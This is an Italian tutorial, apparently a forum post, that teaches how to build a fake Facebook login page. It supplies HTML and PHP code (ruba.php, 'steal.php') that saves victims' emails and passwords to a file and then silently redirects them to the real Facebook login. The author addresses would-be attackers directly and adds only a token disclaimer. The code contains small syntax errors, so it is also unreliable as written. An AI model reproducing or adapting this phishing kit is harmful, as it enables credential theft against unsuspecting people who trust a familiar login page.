Guida alla creazione di un Fake-Login
(ATTENZIONE: Lo script è solo a scopo informativo, non corrispondi di azioni e usi illeciti propri! Fanne buon uso.)
Salve ragazzi, molti di voi si saranno chiesti come potersi impossessare delle password di qualsiasi cosa: io vi dico che è possibile farlo, ma non molto semplice, più che altro perchè dovete usare molto cervello e dovete (in un certo senso) fare cascare le vostre vittime a darvi la password.
Vi posto adesso un semplicissimo script in PHP che, tramite interfaccia grafica (che ve la farete voi), illuderà la vostra vittima di trovarsi sul sito originale ad es. di FaceBook, inserirà l'indirizzo e-mail e la password e vengono portati alla pagina di errore di facebook originale, dove li faranno il vero e proprio login, ma nel frattempo in un file a voi vi si salverà la loro e-mail e la loro password!!
Abbiamo bisogno di 2 pagine, si potrebbe fare anche con una sola, ma ve lo faccio capire meglio!
Descrizione pagina "facebook.html":
allora, tutto quello che si trova fra i tag < > sono dei comandi del codice html..<html> è il tag di apertura di una pagina html, <head> è l'intestazione della pagina dove (in questo caso) c'è soltanto il titolo della pagina fra i tag <title>, <body> invece è il tag di apertura del corpo della pagina, cioè il vero e proprio spazio di lavoro della pagina (quello che verrà visualizzato); apriamo un form con action=ruba.php e method=post, significa che tutto quello che sta dentro il form ha azioni sul file ruba.php usando il metodo post. Mi spiego meglio, la pagina ruba.php è uno script che prende come ingresso delle variabili inserite da un utente, ma che l'utente inserisce in un altra pagina (in questo caso da Facebook.html), quindi grazie ai permessi action e method queste due pagine sono collegate e possono scambiarsi dati. Dentro mettiamo due caselle di testo, una per l'inserimento dell'e-mail con un id (in questo caso "email") e l'altra per la password con id="pw", dopo un bottone che indica il login.
Pagina facebook.html, codice:
Codice PHP:
<html>
<head>
<title>Fake Login Es. FaceBook by FrenkyTribe</title>
</head>
<body>
<form action="ruba.php" method="POST">
Indirizzo e-mail: <input type="text" id="email" name="email" size="20">
<br>
Password: <input type="password" id="pw" name="pw" size="20">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>
Pagina ruba.php, codice:
Codice PHP:
<?php
$email=$_POST['email'];
$pw=$_POST['pw'];
$fp = fopen('dati.html', 'a+');
fwrite($fp, 'E-mail: '.$email.'<br>');
fwrite($fp, 'Password: '.$pw.'<br>');"
fclose($fp);
header(Location: 'https://www.facebook.com/login.php?login_attempt=1');
?>
Nella pagina ruba.php abbiamo il comando dia apertura <?php, a seguire dichiariamo 2 variabili: $email e $pw, dove $email (tramite il metodo POST che abbiamo specificato prima nel form della pagina precedente) prende il valore inserito dalla vittima nel campo di testo email e $pw prende il testo inserito nel campo password.
Ho inserito anche una variabile chiamata $fp dove dice framite il comando "fopen" di, appunto, aprire un file, e se non c'è di crearlo che io coglio chiamare "dati.html" e "a+" significa che in questo file si può sia leggere ma si ci può anche scrivere... Abbiamo 2 comandi "fwrite" che effettuano la scrittura dei dati!! dentro fwrite abbiamo: $fp cioè prende il valore dalla variabile dichiarata prima e capisce che deve scrivere nel file dati.html l'email che l'utente ha inserito, la stessa cosa per la password; il comando fclose, che chiude il file $fp per evitare dei bug.
un Header, cioè che al termine dell'esecuzione dello script la vittima viene automaticamente reindirizzata alla pagina del login di facebook (quella originale); ed infine il tag di chiusura ?>.
[Guida] Fake Login Php!
